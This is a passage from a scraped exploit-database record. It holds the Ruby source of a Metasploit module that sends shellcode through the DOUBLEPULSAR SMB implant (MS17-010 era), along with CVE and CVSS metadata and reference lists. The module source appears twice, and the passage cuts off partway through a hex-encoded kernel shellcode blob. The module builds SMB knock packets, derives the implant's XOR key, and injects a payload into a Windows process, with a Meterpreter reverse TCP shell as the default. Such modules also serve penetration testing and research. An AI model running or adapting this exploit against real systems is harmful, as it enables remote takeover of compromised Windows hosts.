pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-17] #"}, "lastseen": "2021-09-16T22:32:51", "differentElements": ["sourceData"], "edition": 19}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3edaa3a8fe8b6e270420745541bc95b9", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-20T20:22:59", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-16T22:32:51", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-16T22:32:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n 